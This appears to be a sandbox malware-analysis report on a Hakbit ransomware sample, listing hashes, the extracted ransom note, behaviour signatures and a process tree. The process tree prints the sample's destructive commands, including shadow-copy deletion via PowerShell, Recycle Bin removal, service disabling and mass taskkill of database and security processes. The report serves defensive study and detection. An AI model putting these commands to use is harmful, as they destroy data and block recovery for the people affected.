Overview

overview

10

Static

static

10

Dropper/Berbew.exe

windows10-1703-x64

10

Dropper/Berbew.exe

windows10-2004-x64

10

Dropper/Phorphiex.exe

windows10-1703-x64

10

Dropper/Phorphiex.exe

windows10-2004-x64

10

RAT/31.exe

windows10-1703-x64

10

RAT/31.exe

windows10-2004-x64

10

RAT/XClient.exe

windows10-1703-x64

10

RAT/XClient.exe

windows10-2004-x64

10

RAT/file.exe

windows10-1703-x64

7

RAT/file.exe

windows10-2004-x64

7

Ransomware...-2.exe

windows10-1703-x64

10

Ransomware...-2.exe

windows10-2004-x64

10

Ransomware...01.exe

windows10-1703-x64

10

Ransomware...01.exe

windows10-2004-x64

10

Ransomware...lt.exe

windows10-1703-x64

10

Ransomware...lt.exe

windows10-2004-x64

10

Stealers/Azorult.exe

windows10-1703-x64

10

Stealers/Azorult.exe

windows10-2004-x64

10

Stealers/B...on.exe

windows10-1703-x64

10

Stealers/B...on.exe

windows10-2004-x64

10

Stealers/Dridex.dll

windows10-1703-x64

10

Stealers/Dridex.dll

windows10-2004-x64

10

Stealers/M..._2.exe

windows10-1703-x64

10

Stealers/M..._2.exe

windows10-2004-x64

10

Stealers/lumma.exe

windows10-1703-x64

10

Stealers/lumma.exe

windows10-2004-x64

10

Trojan/BetaBot.exe

windows10-1703-x64

10

Trojan/BetaBot.exe

windows10-2004-x64

10

Trojan/Smo...er.exe

windows10-1703-x64

10

Trojan/Smo...er.exe

windows10-2004-x64

10

Resubmissions

03-09-2024 14:02

240903-rb57sazdqf 10

03-09-2024 13:51

240903-q59avszclf 10

02-09-2024 19:51

240902-yk8gtsxbpd 10

02-09-2024 02:27

240902-cxh7tazflg 10

02-09-2024 02:26

240902-cwxc2sygll 10

21-06-2024 19:37

240621-yca7cszgnd 10

09-06-2024 17:07

240609-vm7rjadd73 10

13-05-2024 17:36

240513-v6qblafe3y 10

12-05-2024 17:17

240512-vty3zafh5s 10

Analysis

  • max time kernel
    97s
  • max time network
    124s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09-06-2024 17:07

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Ransomware/Client-2.exe

  • Size

    80KB

  • MD5

    8152a3d0d76f7e968597f4f834fdfa9d

  • SHA1

    c3cf05f3f79851d3c0d4266ab77c8e3e3f88c73e

  • SHA256

    69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b

  • SHA512

    eb1a18cb03131466a4152fa2f6874b70c760317148684ca9b95044e50dc9cd19316d6e68e680ce18599114ba73e75264de5dab5afe611165b9c6c0b5f01002b4

  • SSDEEP

    1536:SHbigeMiIeMfZ7tOBbFv0CIG0dDh/suIicRtpNf8SgRXt+AacRDVX8C4OntD4acN:SHbigeMiIeMfZ7tOBbFv0CIG0dDh/su0

Score
10/10
hakbitevasionexecutionransomwarespywarestealer

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt

Family

hakbit

Ransom Note
To recover your data contact the email below [email protected] Key Identifier: H7G3YJuuj8q96G4oCrkuDvoduF/9K6+1X36bruYBp2LSlWRZ7MUitkqBJdDHcG787gaG9YddPn0HA7nKlVU81Q+uN36hoaG5OTgZf9qc3qVu33wAB3qo9iOxIVZCKoLnuo848J2kP0kWxfKdnHwHrz2lzy5V55CSwC7qKd0q9pGANK4lqqK3UHH5XXjVy5Nl9UQCCZudyxetkjjkG0FDCvele6r0o0LSpkQEda3qOqX1E54XgrLRN41k0/ica5pFFJe0H6RCK6E8thVhDrmWNlv+Fvc4y46VrCaCr3Y83fJ9SnNdn40bzjVyTguyiT+KFwpd3qQSkDcSNCiIWKTSZyPM16HDSR37l2ffHN3CALu7fkF+A/qAghhOJdxmRvQtzc7sAVbxrKX3eVTpT8kuoFCbcBiybdX5iznFsX6/yCWwOfzLMBKdtj9yvll5eCk2ChdDF4VSOn8UaPaLu9NpF8TMt1lREdhJ4A/ru1OgbiNcPzmkTZlCys9ka/VBeG6MEKoXOfAuTWPog7lhrN7KpCq2KOjUgxkZxLfc9m/PjzAfwZY1fIAYk1GKCzNsPuimymd3rOyPg/yhayc3NetNH8VzeFhoLvZpoWCoJZG9rPJ47C7hFEIZy91FR+Owx94Y//pgMPuvAID3yQw9D0zD3a2RBAVcNF5gk0JcYhtSFNI= Number of files that were processed is: 438

Signatures

  • Disables service(s) 3 TTPs
    evasionexecution
  • Hakbit

    Ransomware which encrypts files using AES, first seen in November 2019.

    ransomwarehakbit
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Kills process with taskkill 47 IoCs
    evasion
  • Opens file in notepad (likely ransom note) 1 IoCs
    ransomware
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 48 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Ransomware\Client-2.exe
    "C:\Users\Admin\AppData\Local\Temp\Ransomware\Client-2.exe"
    1⤵
    • Checks computer location settings
    • Drops startup file
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:4704
    • C:\Windows\SYSTEM32\sc.exe
      "sc.exe" config SQLTELEMETRY start= disabled
      2⤵
      • Launches sc.exe
      PID:2288
    • C:\Windows\SYSTEM32\sc.exe
      "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
      2⤵
      • Launches sc.exe
      PID:2700
    • C:\Windows\SYSTEM32\sc.exe
      "sc.exe" config SQLWriter start= disabled
      2⤵
      • Launches sc.exe
      PID:4988
    • C:\Windows\SYSTEM32\sc.exe
      "sc.exe" config SstpSvc start= disabled
      2⤵
      • Launches sc.exe
      PID:4764
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM mspub.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:4012
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM mydesktopqos.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2964
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM mydesktopservice.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:3656
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM mysqld.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:5088
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM sqbcoreservice.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:4056
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM firefoxconfig.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:5016
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM agntsvc.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:1048
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM thebat.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2756
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM steam.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:3212
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM encsvc.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2004
    • C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
      2⤵
        PID:4348
      • C:\Windows\SYSTEM32\taskkill.exe
        "taskkill.exe" /IM excel.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:4000
      • C:\Windows\SYSTEM32\taskkill.exe
        "taskkill.exe" /IM CNTAoSMgr.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:748
      • C:\Windows\SYSTEM32\taskkill.exe
        "taskkill.exe" /IM sqlwriter.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2128
      • C:\Windows\SYSTEM32\taskkill.exe
        "taskkill.exe" /IM tbirdconfig.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1964
      • C:\Windows\SYSTEM32\taskkill.exe
        "taskkill.exe" /IM dbeng50.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1932
      • C:\Windows\SYSTEM32\taskkill.exe
        "taskkill.exe" /IM thebat64.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2624
      • C:\Windows\SYSTEM32\taskkill.exe
        "taskkill.exe" /IM ocomm.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:4980
      • C:\Windows\SYSTEM32\taskkill.exe
        "taskkill.exe" /IM infopath.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:4580
      • C:\Windows\SYSTEM32\taskkill.exe
        "taskkill.exe" /IM mbamtray.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:4252
      • C:\Windows\SYSTEM32\taskkill.exe
        "taskkill.exe" /IM zoolz.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:4496
      • C:\Windows\SYSTEM32\taskkill.exe
        "taskkill.exe" IM thunderbird.exe /F
        2⤵
        • Kills process with taskkill
        PID:4260
      • C:\Windows\SYSTEM32\taskkill.exe
        "taskkill.exe" /IM dbsnmp.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:636
      • C:\Windows\SYSTEM32\taskkill.exe
        "taskkill.exe" /IM xfssvccon.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2608
      • C:\Windows\SYSTEM32\taskkill.exe
        "taskkill.exe" /IM mspub.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1444
      • C:\Windows\SYSTEM32\taskkill.exe
        "taskkill.exe" /IM Ntrtscan.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:4992
      • C:\Windows\SYSTEM32\taskkill.exe
        "taskkill.exe" /IM isqlplussvc.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1816
      • C:\Windows\SYSTEM32\taskkill.exe
        "taskkill.exe" /IM onenote.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1620
      • C:\Windows\SYSTEM32\taskkill.exe
        "taskkill.exe" /IM PccNTMon.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:872
      • C:\Windows\SYSTEM32\taskkill.exe
        "taskkill.exe" /IM msaccess.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:3888
      • C:\Windows\SYSTEM32\taskkill.exe
        "taskkill.exe" /IM outlook.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:4432
      • C:\Windows\SYSTEM32\taskkill.exe
        "taskkill.exe" /IM tmlisten.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:460
      • C:\Windows\SYSTEM32\taskkill.exe
        "taskkill.exe" /IM msftesql.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:5092
      • C:\Windows\SYSTEM32\taskkill.exe
        "taskkill.exe" /IM powerpnt.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1880
      • C:\Windows\SYSTEM32\taskkill.exe
        "taskkill.exe" /IM mydesktopqos.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:3616
      • C:\Windows\SYSTEM32\taskkill.exe
        "taskkill.exe" /IM visio.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2424
      • C:\Windows\SYSTEM32\taskkill.exe
        "taskkill.exe" /IM mydesktopservice.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2820
      • C:\Windows\SYSTEM32\taskkill.exe
        "taskkill.exe" /IM winword.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:5108
      • C:\Windows\SYSTEM32\taskkill.exe
        "taskkill.exe" /IM mysqld-nt.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1476
      • C:\Windows\SYSTEM32\taskkill.exe
        "taskkill.exe" /IM wordpad.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:4472
      • C:\Windows\SYSTEM32\taskkill.exe
        "taskkill.exe" /IM mysqld-opt.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:4520
      • C:\Windows\SYSTEM32\taskkill.exe
        "taskkill.exe" /IM ocautoupds.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:4720
      • C:\Windows\SYSTEM32\taskkill.exe
        "taskkill.exe" /IM ocssd.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:4132
      • C:\Windows\SYSTEM32\taskkill.exe
        "taskkill.exe" /IM oracle.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:560
      • C:\Windows\SYSTEM32\taskkill.exe
        "taskkill.exe" /IM sqlagent.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1916
      • C:\Windows\SYSTEM32\taskkill.exe
        "taskkill.exe" /IM sqlbrowser.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:3952
      • C:\Windows\SYSTEM32\taskkill.exe
        "taskkill.exe" /IM sqlservr.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:3336
      • C:\Windows\SYSTEM32\taskkill.exe
        "taskkill.exe" /IM synctime.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:3668
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:4740
      • C:\Windows\System32\notepad.exe
        "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt
        2⤵
        • Opens file in notepad (likely ransom note)
        • Suspicious use of FindShellTrayWindow
        PID:4252
      • C:\Windows\SYSTEM32\cmd.exe
        "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
        2⤵
          PID:2948
          • C:\Windows\system32\PING.EXE
            ping 127.0.0.7 -n 3
            3⤵
            • Runs ping.exe
            PID:1480
          • C:\Windows\system32\fsutil.exe
            fsutil file setZeroData offset=0 length=524288 “%s”
            3⤵
              PID:2276
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\Ransomware\Client-2.exe
            2⤵
              PID:6120
              • C:\Windows\system32\choice.exe
                choice /C Y /N /D Y /T 3
                3⤵
                  PID:3844

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\ProgramData\Microsoft\Network\Downloader\edbtmp.log
              Filesize

              1.3MB

              MD5

              f322573b409af942f81433425210c54b

              SHA1

              df675c2289a81b0f7f981907b5a4c7fce076ef35

              SHA256

              8aa2619f79d664e3ed7d21b185e33148225090bee94fe333a2c22d3c1c6bf518

              SHA512

              edff5a783e927a8728f478f5d98302a41d863b5ee841b2c026b790284e3bd0f2d4784cf14d5c86c59cff7e73b50d2f83d1f47eb1720d23d6d33227dc0052b41f

              Download Submit

            • C:\ProgramData\Package Cache\{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}v56.64.8804\windowsdesktop-runtime-7.0.16-win-x64.msi
              Filesize

              28.8MB

              MD5

              24035f5e25aec256ab4af8928c5d05c8

              SHA1

              99068c3b3c7aeea85d75edb4859c67094df66b6a

              SHA256

              838c2494bdbffde19969e310297783ef0f0df67ee666115b8e5b5854bc67f94f

              SHA512

              a8bfa73b3bddd088e24b2c2fd4c2ddce50873d26c0aca549c0e35d58353f60850aae7173048fa478046957933732f2f8d3975fadc3f19cac94f27a0ead265ae9

              Download Submit

            • C:\ProgramData\Package Cache\{2BB73336-4F69-4141-9797-E9BD6FE3980A}v64.8.8795\dotnet-host-8.0.2-win-x64.msi.energy[[email protected]]
              Filesize

              728KB

              MD5

              0289a9daaf1955e87caca6d780609e4c

              SHA1

              2d128207611ee686e10351b0fffcb9d723b76eb5

              SHA256

              6eee774c6b6ee5c89a8eabf85ff6978503bf6e5fcf66d85755310bf4fe2125a6

              SHA512

              95c042a018342ecb8521964f360c7fa506f66d1474264d31b34e877a75a7c1d795b38e8e399fee71c76aba1c69adb361a3bb0161e24a8e88d772dc1c5a97b0d0

              Download Submit

            • C:\ProgramData\Package Cache\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}v48.108.8828\dotnet-runtime-6.0.27-win-x64.msi
              Filesize

              25.7MB

              MD5

              c5baf8814e9c9a622810905106f4e323

              SHA1

              ad9a6fc42f0cf89f8c0e0e6f02310d84ae2a7016

              SHA256

              8491ac808065b27fca1e87e6a1f45f514168d629f7258c72ede0781a6f3ba184

              SHA512

              1648cd11b63b39a2f9441e67682cb467529d2a6bef3a1e6b1e09b222df1b1bfc211fdec7aa68b83d3bf47a835652cc7b4f364d3cd8357beba15dc13e770aec88

              Download Submit

            • C:\ProgramData\Package Cache\{BF08E976-B92E-4336-B56F-2171179476C4}v14.30.30704\packages\vcRuntimeAdditional_x86\vc_runtimeAdditional_x86.msi.energy[[email protected]]
              Filesize

              180KB

              MD5

              167a2b2e4042da3e73896fa6a31d4be1

              SHA1

              a2f9f37187fa3e28734abc53d6b56e7dd7bba32c

              SHA256

              8d8766d68e55d15385aa4ce1ab20ef2d38f2aaa0f6d65737f9ffa9bb10a65c09

              SHA512

              c4867d5ecc051894d768003abf8e38518456500b6530977f1bbd73fa82266e98d7e6849f449fb3ffa468bea162a28df5373378ca5b9f5c651334e0f244cfbe6a

              Download Submit

            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
              Filesize

              2KB

              MD5

              d85ba6ff808d9e5444a4b369f5bc2730

              SHA1

              31aa9d96590fff6981b315e0b391b575e4c0804a

              SHA256

              84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

              SHA512

              8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

              Download Submit

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
              Filesize

              944B

              MD5

              d28a889fd956d5cb3accfbaf1143eb6f

              SHA1

              157ba54b365341f8ff06707d996b3635da8446f7

              SHA256

              21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

              SHA512

              0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_efsh24mb.ebn.ps1
              Filesize

              60B

              MD5

              d17fe0a3f47be24a6453e9ef58c94641

              SHA1

              6ab83620379fc69f80c0242105ddffd7d98d5d9d

              SHA256

              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

              SHA512

              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              Download Submit

            • C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt
              Filesize

              828B

              MD5

              c26600a58c7ce7aef305142b64bfce52

              SHA1

              9593fceee6248915b9d4e3d5f7af410f3eb25f0d

              SHA256

              24f5548cb45b59acc6459253d54acf3677bf4f2a37afe0ce0f74a0a7f0e0542a

              SHA512

              22c1c2da810988afb73702cfc323047bc6030f1f3b63c2dbffa464760b0f5df000c33a51a7271cfbfc25cb17c51147c2e80bb32f67720ebdda40af3819c8b5cf

              Download Submit

            • memory/4704-0-0x0000000000F80000-0x0000000000F9A000-memory.dmp

              Filesize

              104KB

              Download

            • memory/4704-2-0x00007FFFC7ED0000-0x00007FFFC8991000-memory.dmp

              Filesize

              10.8MB

              Download

            • memory/4704-1-0x00007FFFC7ED3000-0x00007FFFC7ED5000-memory.dmp

              Filesize

              8KB

              Download

            • memory/4704-561-0x00007FFFC7ED0000-0x00007FFFC8991000-memory.dmp

              Filesize

              10.8MB

              Download

            • memory/4740-17-0x000002B820570000-0x000002B820592000-memory.dmp

              Filesize

              136KB

              Download